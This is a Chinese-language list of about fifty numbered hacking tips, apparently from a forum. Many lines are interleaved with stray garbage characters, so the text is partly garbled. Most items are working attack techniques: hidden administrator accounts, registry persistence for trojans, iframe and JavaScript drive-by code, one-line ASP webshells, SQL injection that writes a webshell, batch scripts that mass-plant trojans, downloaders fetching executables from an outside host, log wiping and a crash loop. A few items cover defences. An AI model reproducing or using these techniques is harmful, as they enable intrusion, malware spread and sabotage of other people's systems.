1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,9 q! M: K9 f: X" Y/ a: Q K
cacls C:\windows\system32 /G hqw20:R
+ ~& g4 F/ q( \1 `. T/ E思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
Y6 d2 Y' k2 m T( ~7 H( P/ \恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F; \6 Y' K( y2 n& M- ~- \+ B
" J+ X+ u% J2 p9 ]
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。5 i+ J* q* I! j; d
7 D L! w- M- w M3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。7 G- w% Y9 w. T" W) A
?: n& N% Q' [ W5 C4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
0 y* Q# x7 q1 z% V0 h1 y- B5 g
$ [8 f# U4 n; }; ~5 |2 H9 F5、利用INF文件来修改注册表, X3 g% R' T0 u
[Version]
1 k" M7 h1 {7 B/ t: z v% R/ K/ JSignature="$CHICAGO$"" k- i# a# u K' k
[Defaultinstall]
' B# s5 C9 D: Q: w( H: _addREG=Ating$ j- V1 _% B5 C# {( J; [+ s" C: q+ Z$ K
[Ating]9 D+ P$ D% n' S! f
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
, d/ y( H \, r1 K以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:. W) d6 G- C/ R
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径- ^( C: K3 [& n
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU" V, `% U6 o* F% f& R1 K! E
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
! i/ @. n R2 L" F( B2 h, MHKEY_CURRENT_CONFIG 简写为 HKCC" u" e9 w. {3 h. p3 Y2 W6 E2 ?
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
9 D" t. k# G) F* a# @! G1 `"1"这里代表是写入或删除注册表键值中的具体数据9 Y; @/ h* O/ [& F6 ^- g& R/ X
- `0 D/ x: m/ m4 c. I6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,5 @" r" `5 {4 d& P+ H- s: d
多了一步就是在防火墙里添加个端口,然后导出其键值
( G3 g) R8 F" [# \0 u1 k" y[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
9 W. r" z9 ]# {6 x/ q; A u
) X( E: V4 q0 x# u; {4 |- i7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
8 s9 k( i9 P' P; f% c3 W在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
0 j+ }( t6 E* I% z" b
: J7 }- Q) w, \$ b7 G8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
$ f" e% r/ @) ]) \; T U: o& L! n# q$ |8 ?: I. J
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell," X/ G8 m7 T, m! |
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。- U6 @" ?- W* R6 X M! C- m8 k
( g4 n+ ~4 J9 ]% b, p" ~# `
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”! }- j. h+ Z3 X: D9 o% q) h
, u8 c) R6 k0 i/ m P11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
7 K- U8 n% @% q' y! o用法:xsniff –pass –hide –log pass.txt
% M2 W; B! _% h# |
0 {- M% Y' u& N2 b* B12、google搜索的艺术
3 J$ @+ U/ `* t4 w& X; j; k搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
/ D( `# u2 y( `- y或“字符串的语法错误”可以找到很多sql注入漏洞。
+ }' B! f. B- a! S Q
3 w* L) ~, Y% ]0 f9 a/ J) v13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
8 H. M+ N" ?9 N" ^1 g: P; [) ^
, b% j- y9 P- e, p2 r5 H: P14、cmd中输入 nc –vv –l –p 19874 M7 B. Q) V8 Y: A
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃2 V2 S+ t9 q+ \
5 _2 L3 _ [$ g9 |, i" P B
15、制作T++木马,先写个ating.hta文件,内容为3 d5 F& |* B! t5 Z7 }6 `3 N
<script language="VBScript">
: N. M# i* j, ^" N& Z0 V9 E8 ~set wshshell=createobject ("wscript.shell" )- t9 U' J9 B5 J' t+ V4 U- j7 q
a=wshshell.run("你马的名称",1)/ s. w2 K5 R+ b$ O3 L# \3 x
window.close# x3 Z+ L4 E% t3 m3 j X/ Z
</script>
4 l4 G( Z) X9 u/ \& N1 z再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。% z, s: z$ {6 V3 z6 o3 ^
4 a' ~& l2 X+ [! J: b
16、搜索栏里输入0 a. }! W1 o4 F
关键字%'and 1=1 and '%'='
$ i# N; H( K+ q1 U关键字%'and 1=2 and '%'='
. K0 r+ k1 w1 A比较不同处 可以作为注入的特征字符
3 Q! ^2 V2 _" m$ l) ~7 Y K) A( V% }/ O' b' y. b& h
17、挂马代码<html>4 n5 X4 B1 e& ~2 [# g& w
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>- H( Q# A! \4 X- E5 S% B* V j
</html>
. ~" S6 K7 x1 Z, m9 w5 y. t7 i$ n' m7 M3 r- W* u3 U' b
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,! _8 Z1 c4 O4 b Y: Z" G
net localgroup administrators还是可以看出Guest是管理员来。, K& i6 [: [. u2 A, D7 v- X @; @3 T" e
" b$ c" v: O% J( c3 @19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等, H- H3 T, {" `8 I8 V; u6 g
用法: 安装: instsrv.exe 服务名称 路径
% r+ M8 L+ Y& ?* `2 y% }卸载: instsrv.exe 服务名称 REMOVE8 @( e3 P J# M$ O$ @- c
- d q; ^: F4 R9 D5 x& g# A. E! g" t
# x9 |8 q' o; {! W. W21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉' e3 j' |$ n3 L, p1 `" u4 J$ m+ v
不能注入时要第一时间想到%5c暴库。
) X9 m: a; G/ J m+ J
7 e( W8 q+ u! `" Q; S22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
' `/ y, G6 l" q; P. P# V: n( n7 |# O; a
23、缺少xp_cmdshell时5 J6 X, J% z1 {5 ]
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'# f+ f" A) L" w9 |8 {" k5 K: N
假如恢复不成功,可以尝试直接加用户(针对开3389的)- R& ?/ p& s2 W e
declare @o int
- O% {* e% b& Z* |+ ?0 o+ W* rexec sp_oacreate 'wscript.shell',@o out
1 n* N$ V; f6 s# p z) W% t) L' f: w$ `exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员% \0 z( J: p- s5 |
. c' U6 _: l' f9 B9 \4 N0 R! z' ]
24.批量种植木马.bat
9 H$ g' Z( ]1 }5 g$ n" J5 i1 gfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
5 u2 @ m \6 K# K$ L; wfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
5 f2 m6 F H- [: `扫描地址.txt里每个主机名一行 用\\开头
, Q4 j M/ l; h& f( N1 P% X% k4 F- [( g8 {: ^5 s; d
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
- `/ Y3 t8 n, w$ |4 J
2 N, s) S0 r" u8 x5 ^0 f26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
2 s, H8 N# s) x5 B {9 W. K将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
7 |( M" G5 @3 d.cer 等后缀的文件夹下都可以运行任何后缀的asp木马0 i3 @0 K. u8 V3 S
" H( P% |/ X( c! B) ~. O6 g0 X# Q27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP+ k- Z( H" n: W$ ]+ {- ^
然后用#clear logg和#clear line vty *删除日志) W: W: [& E# N8 J
+ E' H# f. g* `/ \5 V8 M+ H28、电脑坏了省去重新安装系统的方法/ C- _$ y8 x, n' B# X: n% d
纯dos下执行,8 L$ `) K( L4 X
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config3 L* y3 X J' x4 S
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config' u- V4 Z- D! Z4 ~" e% v d) a
( c/ H$ A6 s3 z9 a- ?7 J7 o
29、解决TCP/IP筛选 在注册表里有三处,分别是:
7 ^2 C0 o) _6 ~; i( L. X- ZHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip) K* d, i- |, U: I/ j* q, a2 h
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip% y* H4 G& Q. w' f, I6 ]
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
, I$ R7 K& Y8 I" j. d# |' j0 m; Z分别用
3 U3 e- b) d/ }0 H: r" X1 rregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
0 s7 o2 d; j' ?% x) r8 ^regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip' G! ?0 w% D% [. O
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip% u2 x* P, h. L V m, B
命令来导出注册表项
- W2 @3 I+ O$ _+ m然后把三个文件里的EnableSecurityFilters"=dword:00000001,
2 t1 @1 T4 A1 e7 ?! z: j改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用5 Z8 | B0 ]7 _4 R6 Q1 @% e
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
2 n, J3 J9 q+ a( j9 \1 ?! P6 h8 k0 [( B& B# R
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U6 K+ `* Q9 D v0 x# H0 m
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3- L, a; X; x! x1 V9 y$ [
; x2 L( \" }- y4 Z31、全手工打造开3389工具4 z5 `" \2 Z2 u- ]( s
打开记事本,编辑内容如下:
$ ]1 d$ F1 N: [echo [Components] > c:\sql
" {* x# b# a; k) t3 Jecho TSEnable = on >> c:\sql% e& G" F. \* Q4 d( f( j
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q7 b# f) {# G1 y7 B# f4 J& J
编辑好后存为BAT文件,上传至肉鸡,执行
# `! S7 n- j/ g& d, U. F' O% p7 n6 k% l" i/ c! j
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马* w6 ^+ q% T" D( C
) w6 x# ] s8 g" b u2 x33、让服务器重启
! Z, n0 L- a' H2 Y' J# t8 L/ X写个bat死循环:
2 |, h- Y. _% m@echo off
8 ]% M7 e+ T0 I' K p:loop1
0 F, \4 \# M1 F9 U$ m* [$ Jcls* w% z( m$ D% t- Y8 D# z* {
start cmd.exe0 P6 [4 t- F3 ]/ A. K$ D; {' D
goto loop1$ {: F8 O5 ]5 k+ V u& W
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
9 u* ^, L+ f1 D; S+ }/ z% _4 i" G; J: S$ a U; b4 k- ~1 N
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
* H. _1 K% b' R@echo off: V* b/ P* ]6 F4 X5 ^- `
date /t >c:/3389.txt# z3 g1 A! s3 l% X8 ]
time /t >>c:/3389.txt: j% ^, R! L5 r3 X- N- G
attrib +s +h c:/3389.bat( r- r2 p, v' V2 D0 c# h3 t
attrib +s +h c:/3389.txt
1 q0 f" `4 I6 r6 W2 Mnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt3 F7 r7 L/ y3 m% r# g8 ^- q; P2 B
并保存为3389.bat t" j' \2 p/ f
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
# R' `5 t; ^ a9 y) l0 K( p( a9 O( w" c! k v
35、有时候提不了权限的话,试试这个命令,在命令行里输入:1 z- _' {( V: x1 Z
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)9 ^& O5 N( c- f
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
; i; U' L( l: g: A0 K- O" J; G V: X3 a% d1 P
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
- a" c9 Y" v1 |8 w o8 |6 decho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址3 S% [9 ^ J7 Y2 O2 L* T9 `* l
echo 你的FTP账号 >>c:\1.bat //输入账号
" ^2 ~# C6 I5 Z: ], |6 oecho 你的FTP密码 >>c:\1.bat //输入密码
$ ?* g( P5 { g, a: j% u8 jecho bin >>c:\1.bat //登入
9 |3 E, l6 |0 m" vecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么" W, E* ^. i! {9 P$ D: a- ?* H# ~
echo bye >>c:\1.bat //退出
3 s" Q9 W2 W _+ ]然后执行ftp -s:c:\1.bat即可
8 T1 E: f: O$ a
: {: P' [# A3 n* {* u; h$ n37、修改注册表开3389两法
1 Y4 P0 T- @# L& M: g+ Y(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
, b, l6 x0 N: F. y4 \. a; G/ Vecho Windows Registry Editor Version 5.00 >>3389.reg/ p& y1 z# I+ e! G) @ a
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
% v1 b; W8 K9 s Z! G ~+ Y$ oecho "Enabled"="0" >>3389.reg$ ], E: T1 S2 p; @ M" l
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
6 L8 N, Z4 n6 _% u1 ^/ dNT\CurrentVersion\Winlogon] >>3389.reg
# A) K" n9 P7 _ _3 `6 P/ jecho "ShutdownWithoutLogon"="0" >>3389.reg& g4 Q. K, A# J8 U
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]9 C& ?0 K- D) p
>>3389.reg2 B! B. r7 Z* E% p
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg ]2 p& T: s1 W3 `1 t
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
$ Z/ S* d* a2 y" k0 E: y5 t>>3389.reg% W% A! X% A8 N! w7 h5 J9 u, Q( _! ?: v
echo "TSEnabled"=dword:00000001 >>3389.reg0 x- M: v$ O4 m8 ^& Z3 R# S
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
4 V3 K2 G7 u9 Pecho "Start"=dword:00000002 >>3389.reg
, C3 R" z3 U2 \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
. O( A) y9 E) F7 ]) g>>3389.reg
4 L& v; ~1 c6 fecho "Start"=dword:00000002 >>3389.reg
& E+ D6 T' Z0 M/ Hecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
2 I6 d$ X0 r% Z) O$ u( H- v+ Vecho "Hotkey"="1" >>3389.reg
+ ^/ A# A' ^1 W9 H$ Becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal7 u! f, T) E/ Z6 s
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
& b# v8 {. v) ?: @echo "PortNumber"=dword:00000D3D >>3389.reg$ ?% j7 n5 W7 G$ A# c: ]; v# B/ |
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" d3 A4 ~) X$ T& f8 t: C dServer\WinStations\RDP-Tcp] >>3389.reg
9 H8 f. Y6 ^4 D6 D x$ Decho "PortNumber"=dword:00000D3D >>3389.reg
1 G7 I7 b% K. S w; a8 Q把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。3 G& `9 V8 N4 K9 w" O5 x
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了): b7 q; l) A" b/ j. p& I% n6 v
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效& j9 F% z/ H; N
(2)winxp和win2003终端开启
/ ?; f3 f+ y9 p" d用以下ECHO代码写一个REG文件:
1 s( ]3 P: e8 o# Vecho Windows Registry Editor Version 5.00>>3389.reg
k4 x$ ~/ Q' E9 Becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal. c$ U$ U% P: O; W" P
Server]>>3389.reg
! N& h% ~% [8 y$ Pecho "fDenyTSConnections"=dword:00000000>>3389.reg
0 A: k* j! I6 [ V$ @. qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 ~+ C# n d" M q) w Y
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
) J8 i. p2 v; M/ a9 F Lecho "PortNumber"=dword:00000d3d>>3389.reg( Q- X$ l$ x: I, g5 ]' w) n! D; j
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal: c1 j: ?7 V( m q
Server\WinStations\RDP-Tcp]>>3389.reg# X% O* R4 s# e) R% ~
echo "PortNumber"=dword:00000d3d>>3389.reg
) }6 i$ @- P; \4 U1 |- S然后regedit /s 3389.reg del 3389.reg
, w9 ?+ V/ U" t4 U$ i1 `* ?" IXP下不论开终端还是改终端端口都不需重启0 N; w" U( C B* r' e3 [1 V
' `1 A% a& X6 H! W38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃3 L8 X; @0 h# x6 T
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
5 t& W" y A; Q$ Z/ {1 n
( K$ x6 k4 Z8 y0 m39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
7 n& w! `1 O5 P" a(1)数据库文件名应复杂并要有特殊字符
/ H+ k* i) R# A# p(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
0 |7 M/ p( A6 \( {3 r% L8 W! Z将conn.asp文档中的
9 f3 M8 u' B1 wDBPath = Server.MapPath("数据库.mdb")
* u3 @0 @! u: ~/ Nconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath! m2 }% [2 K0 |( ^; V+ O
q$ d3 G- N6 L' P) Y9 \# b修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置/ }8 e+ e ^ G: f5 w4 E' J; r$ G8 o
(3)不放在WEB目录里
. D' W& o! Q. s% b6 C- F, c" g9 D$ k) u, { {
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
' s, e K9 ]0 q% _可以写两个bat文件
% G& v$ _/ Y/ Q9 u+ u@echo off5 T' q6 F3 D& o4 Z g
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
6 N* U% J H, g) E4 y5 c2 x@del c:\winnt\system32\query.exe3 y" e3 M' ]/ i& Z3 h1 e
@del %SYSTEMROOT%\system32\dllcache\query.exe
3 @2 j b7 K) K! B0 B0 S@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
+ D1 N" P$ ~- N' z# x. ]' P
1 T1 h6 U7 n1 o) r2 F@echo off
: A( b$ |8 N4 B$ K/ [, K) ?@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
) K4 |- \; d1 ~7 |@del c:\winnt\system32\tsadmin.exe
/ z* C2 w4 U, j2 |& s7 h@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex, l: @' U* ^5 ` X* z- v
( `; v; w1 a! i1 k3 [" ~! S41、映射对方盘符+ ^9 @0 D5 v' J! {5 A! U
telnet到他的机器上,7 F: U+ H. ]+ C0 `4 k
net share 查看有没有默认共享 如果没有,那么就接着运行, Y1 z% _( t: y/ O
net share c$=c:
% `9 k% d8 n y8 }' Q5 k3 gnet share现在有c$* b) k: Q9 f* e6 H; S* k
在自己的机器上运行. u# p0 I( N! ]
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
: ?8 L# k6 T h/ j
+ u$ x( F* D( q1 b42、一些很有用的老知识
5 c" b1 I6 V4 R* H) c2 I0 T) Rtype c:\boot.ini ( 查看系统版本 )- \7 x* r4 @9 Q5 o- Y3 E" n7 o& R% ~
net start (查看已经启动的服务)1 X2 a) F& @2 _/ U
query user ( 查看当前终端连接 )/ a0 |% D# j8 h
net user ( 查看当前用户 )% z( d }) y2 m. \/ K% l
net user 用户 密码/add ( 建立账号 )5 d' y5 B+ x: I9 P; r3 f* Z
net localgroup administrators 用户 /add (提升某用户为管理员)" a5 y$ q" O( p5 D2 H: l
ipconfig -all ( 查看IP什么的 )
% i) x; k( ^8 e' O" }9 cnetstat -an ( 查看当前网络状态 )5 e6 J: ]+ V h8 H- X& M a
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)5 O% ~: _/ k/ L$ _* b+ f
克隆时Administrator对应1F4
5 w7 e( u4 h- d. zguest对应1F5
4 ?' k" U8 i( c7 a+ P! Ftsinternetuser对应3E8
) b; H7 ^& C" E! j B, Y% Q* v* j
8 e, i6 d0 j5 K9 T; e43、如果对方没开3389,但是装了Remote Administrator Service( B! f) X6 T, R6 `: L/ s- ]! D
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接, B; l0 V" [0 k0 V
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
& o% z* H( p8 D, h& A先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"' y) W" H- s( ]' {5 V( ~0 T, Z
- O# f, w4 @( q# @/ o( C, a
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
9 C8 S9 a9 P0 m6 j/ a本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
% @6 x3 N' L3 W3 e
. P2 R0 ^9 {, B7 C. I+ p% H45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)$ P1 r# l3 F \0 s0 K9 r$ x
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open3 x- d2 b. D2 ]0 C8 h7 V
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
7 X2 w+ C1 g+ u; S$ X V# z5 xCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
5 p- B6 s0 L; R3 w; a& K. Q1 Z1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs+ v4 q: Y0 h: Y+ A4 \
(这是完整的一句话,其中没有换行符)5 E- |* L! A3 x8 z2 W
然后下载:
) H$ h. ?# T& l4 J4 F Gcscript down.vbs http://www.hack520.org/hack.exe hack.exe6 |( J% n4 r2 O) ]
' K- e! t8 F1 W0 N" d
46、一句话木马成功依赖于两个条件:3 ^$ n9 g4 N0 v0 {! N) W( [
1、服务端没有禁止adodb.Stream或FSO组件* [& c9 s0 R8 E
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
$ M! L h: d# D: n7 Q" J- t) I9 ]1 z t8 b
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
2 j- z. i3 F! k0 Q% Y; D) f1 F;alter database utsz set RECOVERY FULL--
8 J; G e0 ?8 B% ~5 y;create table cmd (a image)--
- u( ~" |$ C& Y: h9 U; h0 f;backup log utsz to disk = 'D:\cmd' with init--
0 m" o5 P' X) \;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--& v. C7 S8 \5 O2 W
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--8 ]4 T" c( c- T9 G/ _9 R! F3 p
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。0 }6 C6 i( V X7 h# q, m0 c
5 g& ~1 K8 t) r. K6 u* O48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
2 T% q3 ]% H" W5 V* f1 Z* f
8 M/ O: O& l8 m( r6 v用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
/ F! r2 B1 L; ?. J. p6 s$ u所有会话用 'all'。
2 L6 H/ r$ }! B-s sessionid 列出会话的信息。
, a5 V" s, L7 n& A2 S- ~-k sessionid 终止会话。1 P3 V# ]0 d' n* `# L' D/ d
-m sessionid 发送消息到会话。) @4 \* m- m y! {# _6 t9 S3 E
& ]0 d1 N# c7 H. B oconfig 配置 telnet 服务器参数。
* M" U0 Z, F) ]9 v4 X( N- i
2 w f, d7 e) a1 Pcommon_options 为:
) x5 e: R; d4 |* g& c. N-u user 指定要使用其凭据的用户
2 [1 a. c; H8 X" G-p password 用户密码
! P( l: G4 k, O8 T9 A
' C, E; k( S+ W. P% I5 O/ c5 `, Gconfig_options 为:
1 V4 n7 Z) L( h$ Q, ^dom = domain 设定用户的默认域
& Y+ s; q: C, ^! I, Hctrlakeymap = yes|no 设定 ALT 键的映射/ x; d7 K$ ~* G, K2 t( ?
timeout = hh:mm:ss 设定空闲会话超时值
! Y) A0 C3 Q8 `# t$ ktimeoutactive = yes|no 启用空闲会话。
* V0 [6 b! [+ `" Q4 x6 s3 F" Nmaxfail = attempts 设定断开前失败的登录企图数。
; h5 F; d; ?( emaxconn = connections 设定最大连接数。
% T9 ], i+ k( Y3 Lport = number 设定 telnet 端口。+ Z( o8 j6 |) C- a1 ^
sec = [+/-]NTLM [+/-]passwd& D' L8 `* [/ X0 }
设定身份验证机构9 f; N8 T5 `) {2 s+ L& ]
fname = file 指定审计文件名。
3 L" G( f' f) M/ t6 Z% A* [fsize = size 指定审计文件的最大尺寸(MB)。
6 y d8 |$ N6 v; n; s( x7 S. xmode = console|stream 指定操作模式。
7 `( e3 a" q4 f g2 lauditlocation = eventlog|file|both$ A8 w! V5 A& S, V; V$ j
指定记录地点
4 C+ g# r" T' iaudit = [+/-]user [+/-]fail [+/-]admin; K* A! a) M3 v- d2 a0 F5 l2 S
1 _# W+ h) J, G4 S" Q5 Z
49、例如:在IE上访问:7 W# z' l( a. w: x+ d7 z
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/$ h* X7 J6 w5 w5 n( C* `( E
hack.txt里面的代码是:
& ~! l& e6 V+ @* n* a, w8 o) J6 ]' e<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
9 z: ^" P. v' s3 D# V. v把这个hack.txt发到你空间就可以了!
0 H# e; o" P- W$ A( e这个可以利用来做网马哦!
9 [- `$ j" H5 T* T. B) Z5 w$ ~# w8 a+ e, b% F7 l
50、autorun的病毒可以通过手动限制!& ]5 B" `. T \. U; M" ~4 [
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
" p' E" ^, c7 h% y+ R3 K5 K2,打开盘符用右键打开!切忌双击盘符~
7 J8 Q: ?. p$ }; e9 e3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
* j" ^; E- `7 U0 g" {* F' o, Y0 s+ I
51、log备份时的一句话木马:
& C M7 {$ \- {2 X) [4 R% G" pa).<%%25Execute(request("go"))%%25>
( x1 ^- b5 y0 \. Ub).<%Execute(request("go"))%>3 v2 P' {: H- v" A" k* g3 g
c).%><%execute request("go")%><%; u+ E3 I! Q9 k6 j1 U9 \1 Q. t
d).<script language=VBScript runat=server>execute request("sb")</Script>& f; Z7 t9 R6 s2 {
e).<%25Execute(request("l"))%25>
# W- J$ o! W5 z B4 jf).<%if request("cmd")<>"" then execute request("pass")%># {7 n ]- o3 s2 {/ `# f
+ z; ?1 ?6 s5 y5 Y* U52、at "12:17" /interactive cmd+ I5 X( d# `/ ~6 c" Q2 K
执行后可以用AT命令查看新加的任务% e+ w o' p2 z2 j3 r+ `
